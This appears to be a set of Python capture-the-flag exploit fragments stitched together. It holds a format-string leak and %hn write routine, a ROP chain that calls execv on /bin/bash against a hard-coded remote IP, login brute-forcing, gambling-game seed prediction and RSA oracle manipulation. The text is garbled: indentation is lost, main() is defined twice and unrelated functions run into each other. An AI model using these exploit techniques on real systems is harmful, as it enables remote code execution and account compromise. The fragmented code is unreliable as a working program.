def get_balance(self):
self.do_send('2')
match = b'Your currnet balance is (\w+) gitsCoins'
res = self.conn.recv_until(PatternMatcher.fromre(match))
m = int(re.search(match, res).group(1))
if m > 999999:
print(res)
sys.exit(0)
return m
def get(self, sig, bet):
self.send_num(binascii.b2a_hex(sig))
self.send_num(binascii.b2a_hex(bet))
res = self.x.recv_until(PatternMatcher.frombytes(b'EOF<<\n')).decode()
print('got >> ', res)
if re.search('>>FAILED', res):
return False
m = re.search('E=(\w+)\nD=(\w+)', res)
assert m
return m.group(1).encode(), m.group(2).encode()
def get_return_cards(self, hand):
cards = hand2cards(hand)
self.oracle.send(' '.join([str(x) for x in cards]))
self.oracle.send('\n')
res = self.oracle.recv_until(PatternMatcher.frombytes(b'END\n'))
res = res.decode()[:-4].rstrip()
if len(res) == 0:
return []
return [int(x) for x in res.split(' ')]
def go1(s, pwd, win=0):
s.send('login ' + pwd + '\n')
if win:
pattern = b'Login successful'
else:
pattern = b'what you entered: (\w{12})'
res = s.recv_until(PatternMatcher.fromre(pattern))
print(res)
m = re.search(pattern, res)
if not win:
return int(m.group(1), 16)
return 0
def load(self, pid):
self.pid = pid
helper = ProcHelper(self.pid)
regions = helper.get_memory_regions()
ld_res = regions.get_elf_entry(PatternMatcher.fromre('/ld'))
libdl_res = regions.get_elf_entry(PatternMatcher.fromre('/libdl'))
libc_res = regions.get_elf_entry(PatternMatcher.fromre('/libc'))
target_region = query(
regions.regions).where(lambda u: u.typ == 'stack').order_by(
lambda u: u.size).then_by_descending().to_list()[0]
self.page_start = target_region.start_addr
self.target_addr = self.page_start + self.target_addr_off
self.ld_elf = ElfUtils(ld_res.file, offset=ld_res.start_addr)
self.libdl_elf = ElfUtils(libdl_res.file, offset=libdl_res.start_addr)
self.libc_elf = ElfUtils(libc_res.file,
offset=libc_res.start_addr,
load_sym=False)
self.inject_section = self.stage0_elf.get_section('.inject')
self.stage0_entry_off = self.stage0_elf.get_symbol(self.stage0_sym)
def write_addr(x, sz, post=b'', wait=1):
if sz <= 8:
data = b'a' * sz
else:
data = '%0{}x'.format(sz)
data = data.encode()
data += '%{}$hn'.format(id_ptr_ctrl).encode()
data += post
data += b'D\n'
x.send(data)
if wait:
res = x.recv_until(PatternMatcher.frombytes(b'D\n\n'))
def play(self, bet):
self.conn.recv_until(PatternMatcher.frombytes(b'Play Video Poker'))
self.do_send('3')
self.conn.recv_until(PatternMatcher.frombytes(b'Bet:\n'))
self.do_send(str(bet))
res = self.conn.recv_until(
PatternMatcher.frombytes(b'Please supply your')).decode()
m = re.search('Our Secret_hash is ([0-9a-f]+)\n', res)
assert m
host_hash = binascii.a2b_hex(m.group(1))
guessed_len = 0xe6 # prob 0.36?
secret_len = 0xf4
secret = b'a' * 0x100
deck = get_default_deck()
self.conn.send(deck)
res = self.conn.recv_until(
PatternMatcher.frombytes(b'Supply your secret')).decode()
self.conn.send(secret)
#print('deck >> ', deck)
res = self.conn.recv_until(
PatternMatcher.fromre(b'Which cards would')).decode()
hand = re.search('Your starting hand is (\w+)\n', res).group(1)
#print('hand is >> ', hand)
return_hand = self.get_return_cards(hand)
#print('return cards >> ', return_hand)
send_hand = ''.join([str(x) for x in return_hand])
#print('sending >> ', send_hand)
self.do_send(send_hand)
res = self.conn.recv_until(
PatternMatcher.fromre(
b'The seed for our shuffle is [0-9a-f]+\n')).decode()
sol_hash = re.search('shuffle is ([0-9a-f]+)\n', res).group(1)
final_hand = re.search('Your ending hand is (\w+)\n', res).group(1)
correct_seed = struct.unpack('<I', binascii.a2b_hex(sol_hash)[:4])[0]
def step1(conn):
res = [encode(0) for i in range(5)]
for i in range(5):
reslist = []
for j in reversed(range(12)):
pos = encode(j)
res[i] = pos
if pos[0] == 3 and pos[1] != 1: continue
msg = '|'.join([f'{x},{y}' for x, y in res])
matcher = PatternMatcher.fromre(b'(SECONDS)|(GIVE ME A ROOM CODE)')
mx = conn.send_and_expect(msg, matcher).decode()
try:
xx = re.search('IN ONLY ([\w.]+)', mx).group(1)
time = float(xx)
print('TIIIMIE ', time, xx)
reslist.append((time, pos))
except:
print('FUU ', mx)
sx = 'YOU THIS TOKEN:\n>>> '
rem = mx[mx.find(sx) + len(sx):]
token = rem[:rem.find('\n')]
print('TOKEN IS ', token)
roomnum = re.findall('\| (\S+)', rem)
print('ROOM ', roomnum)
roomnum.append('ADMIN')
roomnum.append('GUEST')
roomnum.append('DEBUG')
#roomnum.append('/x#@-')
#roomnum.append('[:$*;')
#roomnum.append('/x#@-[:$*;')
for i in range(110):
roomnum.append(base64.b64encode(str(i).encode()).decode())
conn.recv_until('AND YOUR TOKEN')
return token, roomnum
print('BEST ', res[i])
res[i] = max(reslist)[1]
def main():
if 1:
patch()
return
print(host, port)
with Connection(host, port) as s:
cnds=[]
n=8
nx=len(alnum_list)
T=0
H=(len(alnum_list)**n)-1
while T<=H:
M=(T+H)//2
s.send('admin\n')
buf=b''
v=M
for i in range(n):
buf+=alnum_list[v%nx]
v//=nx
buf=buf[::-1]
s.send(buf+b'\n')
print('on iter ', T, H, buf)
res=s.recv_until(PatternMatcher.fromre(b'error code=(1|-1)|Successfully'))
if res.find(b'Successfully')!=-1:
print('found for ', buf)
T=M
break
else:
print(res)
m=re.search(b'error code=(1|-1)', res)
assert m
if int(m.group(1))==1:
T=M+1
else:
H=M-1
def solve():
remote = 1
if remote:
conn = Connection('52.6.64.173', 4545)
else:
conn = Process('./ebp')
with conn as x:
data = ''
for i in range(60):
data += '{}:%08x '.format(i + 1)
data += '-1END\n'
x.send(data.encode())
res = x.recv_until(PatternMatcher.frombytes(b'END\n'))
res = res.decode()
tb = [x.split(':') for x in res.split(' ')]
tb.pop()
tb = {int(x[0]): int(x[1], 16) for x in tb}
print(res)
global id_base_addr
id_base_addr = tb[4] - 0x18 - 0xc - 3 * 4
g_int80 = 0xf761fa63 - 0xf7584979 + tb[44]
mk = tb[12] & 0xffff
if not mk < 0x300:
return False
expected_exit_off = 0xf7621150 - 0xf7619979 + tb[44]
print('cxa should be at >> ', hex(expected_exit_off))
y = X86Machine(0)
print(hex(tb[44]))
#disp_ins(x, y,tb[44]-libc_id_off, 20)
if 0:
c = code.InteractiveConsole(locals=dict(locals(), **globals()))
c.interact()
return
if 0:
while True:
try:
data = input('next addr? ')
data = data.split(' ')
addr = int(data[0], 16)
n = int(data[1])
res = do_read(x, addr, n)
print(res)
#disp_ins(x, y, addr, n)
except KeyboardInterrupt:
raise
except Exception as e:
print(traceback.print_exc())
pass
libc_start = tb[44] - 9
if remote:
execv_off = 0x9b100
else:
execv_off = 0x000b3140 - 0x00018570
g_execv = libc_start + execv_off
g_pop3 = 0x80485dd
need_write = (tb[12] - 0x20) & 0xffff
target = tb[12] & ~0xffff
target_start = 0x340
target += target_start
g_pop1 = 0x8048385
rop = RopBuilder(target, 4)
rop.add('I', tb[12])
rop.add('II{I:_ref_path}{I:_ref_argv}{I:_ref_env}', g_execv, 0)
rop.add('{#argv}{I:_ref_path}{#env}I', 0)
rop.add('{#path}{"/bin/bash}?', 0)
buf = rop.get()
print(buf)
for i in range(len(buf)):
write_ctrl_addr(x, target + i)
write_addr(x, buf[i])
write_ctrl_addr(x, tb[4] - 0x20)
disp(x)
input('final write')
write_addr(x, target_start, buf, 0)
c = code.InteractiveConsole(locals=dict(locals(), **globals()))
c.interact()
time.sleep(1)
res = x.recv(1024)
print(res)
res = x.recv(1024)
print(res)
res = x.recv(1024)
print(res)
res = x.recv(1024)
print(res)
input('finish')
return True
def main():
dsa = DSA.generate(512)
data = [dsa.key.y, dsa.key.g, dsa.key.p, dsa.key.q]
data_str = ','.join(map(str, data))
chunk_size = 64
chunks = []
for i in range((len(data_str) + chunk_size - 1) // chunk_size):
tmp = data_str[64 * i:64 * i + 64].encode()
chunks.append(binascii.b2a_hex(server_pub_enc.encrypt2(tmp)[0]))
enc_key = b','.join(chunks)
n = 0x345080e693fa74f29d5ccac2f13556bea2541231949e14d7cd86068e5adcbc3d5622936f770fab224beea0da967057fdd9cd8419561c77445fa8b358720afc9f3703acc4b3b6901140587d83477fd271d3499797f9582bb1a5c985804ff905055cc4efecedd70cacc219ca3ba49537d6268ab66aa1c639c1963e089f3a63aac9b8b
n = 0x167c731ae38435961bd5322b2b0ec685027147d194b8096fc2bcadacbece96d29b11c93dff0417644387aaca8cbdaa3bc895fd787c8fed999c19efcda1b0603b79370e675fc3a7e5536c8b07566b845a2fb513735d7ddb5051d04fe129eae00f17896ca892087388249b4e68acf46ed6938338a03b3a542b2c20f861cbc86eab10751
n = 0x3ada6f51c3e3009b4b63bb14b710624f321248b12741559e29a487eaaa05167dfd9f712e1825769ba612595b81945e0def05c379cc11a4419a3bfa00f14c6ca43ec21306955fc16621025898b59219cc1c4e0474719dbc715f9c31344c9af39a3d954fedc39651f244ee2c333fe257125a97d4db45135b53eb2383714f302bcf6b6
n = 0x29b32eb59e7ee1c467e1cc952af0d531d9d3128fbd6aecab8394fddc016e7786267b212bdaf6d343fef51a7a8ebec644c65d040f70b99e5a5c570024328431d17800ecd478bcb6fb92c0dfd76fd7cea637d9317c1cdd90b9b30f548daa7e39fb5a9d289246e4b90ec665e797bc76587d4d19e2edb2e6269621910f83b17726240de12c18e69a
n = 0xc56f3ad5b3eca2ea9920c4fb01a84bf6538e2a5dd9f776a9fa1b22590a8609bb4a03ed13c7c07aa82d792c5676c8296381518838b03444079604b88b1d5048d2da88c036201c1599da302532b94a0ba9902750748d491bbfb1c0da674b6cbba0c1fb6bb693080eabdd0c7096757c8b80fe8ca6d82cb1bc5151a30fa40f9ea982675b1
k = RSA.construct((n, 12))
x = PKCS1_OAEP.new(k)
assert len(sys.argv) > 1
with Connection(remote, remote_port) as conn, Process(sys.argv[1]) as proc:
print('ENCRYPT MOFO')
try:
len_sig = len(x.encrypt2(b'kfwefappa')[1])
except:
print('EJSUS FAIL')
raise
print('ENCRYPT MOFO')
sent_sig = 'YOU KAPPA F**K'
prefix = '\x00' * (len_sig - len(sent_sig))
sig = prefix + sent_sig
sig = sig.encode()
db = []
y = Oracle(proc)
y.send_num(hex(n)[2:].encode())
odd_max = 2
if 0:
for i in range(0, odd_max):
s = get_guess_for(i)
print('ON STEP >> ', i)
nbit = 10
for A in range(2**nbit):
s2 = ''
for j in range(nbit):
if A >> j & 1:
s2 += ' '
else:
s2 += '\n'
s2 = s + s2
gen = x.encrypt2(s2.encode())[1]
print(gen)
print(hex(n))
work = gen
res = y.get(sig, work)
if res:
db.append(res)
break
else:
assert False
else:
db.append([
b'a0fbbacc479a8a3af09aebdbb9ae30834a10699d9d618108514d88f308161577809ae60e182c75e0f95797806179363a4c17da900373a3879ac3a692dc5f8f8b1e022eee294dd7013858394fa2f366179f64c9ab0ff28c89b3a78b1a6b6a8852de7a3f5de4dbe6ae0667941e8283f4c3eaa22572cc4dd4dceef54251bd3cf4690d301',
b'2a1fed419b80c8145524c84c9c1f2efdf598d18da0eecfd2892a8956358827e613cf05c505e9b902277727c889a7ff32ea0b4bbe018fc8acc33743cfa14d31597a0e879135edc1257c8815208817dc7f6ed470c4e75742890ec7f7604c7025afa4f0f6193e3df2925320553ea1c9be3982369dd2b35b2b858fc7ea029e132693e355'
])
db.append([
b'42de041b5d51a89aa133a02dcb108a0714344d6cd0e23cee44d0e64a7c03fcd7163a8195f106ab8664215d9d13efa63871189ddbf25a7aedb1803c6ae5d8c75bd3aa78ac934f68ff1b55d4984bd66b8e79d1b490d553f1f0b3d93c04101e78603e94e5577f6525f934bef8016497820831e9e6a4571e446334a98e1b9d99f015a1735',
b'70f611574824ae1ca492657f842feb2fea44283f7e7cc1da42997df2a54402975a490b9ca3990c95536c93c317976d7db1c844575b5f3f12bd9cc4f83808f31635749dd58da1b4cb392b08131766472895db3beb16f5317f4477a0df71f84c22de477066ce0bc4468df5a68e2527390c561c8c177b823f824b6926acf17599447f509'
])
print('sending')
conn.trash(1)
conn.send(enc_key)
while True:
time.sleep(0.5)
pattern = b'You have \$([0-9]+)\)\n'
res = conn.recv_until(PatternMatcher.fromre(pattern))
monies = int(re.search(pattern, res).group(1))
assert res
conn.send('{}\n'.format(monies))
conn.recv_until(PatternMatcher.frombytes(b'At what odds'))
conn.send('{}\n'.format(odd_max))
conn.recv_until(PatternMatcher.frombytes(b'Alright, what is your'))
send_with_sig(dsa, conn, binascii.b2a_hex(sig))
res = conn.recv_until(
PatternMatcher.frombytes(b'Now what is your'))
rng = re.search(b'the secure RNG is ([0-9]+)\n',
res).group(1).decode()
rng = int(rng)
print('rng is >> ', rng)
want = rng % odd_max
uu = get_rsa_key_from_db(n, db[want])
print(uu)
privkey = PKCS1_OAEP.new(RSA.importKey(uu))
guess = privkey.decrypt(sig)
guess = int(guess[len("I hereby commit to a guess of "):])
send_with_sig(dsa, conn, uu)